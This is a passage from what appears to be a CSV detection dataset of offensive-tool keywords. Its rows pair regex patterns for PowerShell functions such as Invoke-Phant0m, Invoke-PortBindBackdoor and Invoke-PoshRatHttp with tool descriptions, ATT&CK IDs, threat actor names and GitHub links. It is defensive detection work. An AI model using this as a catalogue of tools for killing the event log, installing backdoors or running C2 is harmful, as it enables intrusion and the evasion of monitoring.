T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","49278" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","Invoke-Phant0m","This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. 
I want to learn Powershell and Low-Level things on Powershell for cyber security field","T1059 - T1086 - T1216","TA0007 - TA0008","N/A","N/A","Defense Evasion","https://github.com/hlldz/Invoke-Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","49279" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","49280" "*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49281" "*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","49282" "*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","49283" "*Invoke-PhishingLNK*",".{0,1000}Invoke\-PhishingLNK.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - 
T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49284" "*Invoke-PhishingLNK*",".{0,1000}Invoke\-PhishingLNK.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - 
Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49285" "*Invoke-PhishingLNK.ps1*",".{0,1000}Invoke\-PhishingLNK\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49286" "*Invoke-PingSweep *",".{0,1000}Invoke\-PingSweep\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - 
T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","49287" "*invoke-pipekat *",".{0,1000}invoke\-pipekat\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49288" "*Invoke-Piper*",".{0,1000}Invoke\-Piper.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","49289" "*Invoke-PiperClient*",".{0,1000}Invoke\-PiperClient.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","49290" "*Invoke-PiperServer*",".{0,1000}Invoke\-PiperServer.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - 
T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","49291" "*Invoke-PipeShell.ps1*",".{0,1000}Invoke\-PipeShell\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49292" "*Invoke-PortBind*",".{0,1000}Invoke\-PortBind.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49293" "*Invoke-PortBindBackdoor*",".{0,1000}Invoke\-PortBindBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49294" "*Invoke-PortFwd *",".{0,1000}Invoke\-PortFwd\s.{0,1000}","offensive_tool_keyword","empire","Empire 
is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49295" "*Invoke-PortFwd.ps1*",".{0,1000}Invoke\-PortFwd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 
- T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49296" "*Invoke-PortKnockBackdoor*",".{0,1000}Invoke\-PortKnockBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49297" "*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49298" 
"*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49299" "*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - 
Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Portscan.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49300" "*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49301" "*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49302" "*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49303" "*Invoke-Portscan.ps1*",".{0,1000}Invoke\-Portscan\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49304" "*Invoke-Portscan.ps1*",".{0,1000}Invoke\-Portscan\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49305" 
"*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49306" "*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49307" "*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49308" "*Invoke-PoshRatHttps*",".{0,1000}Invoke\-PoshRatHttps.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
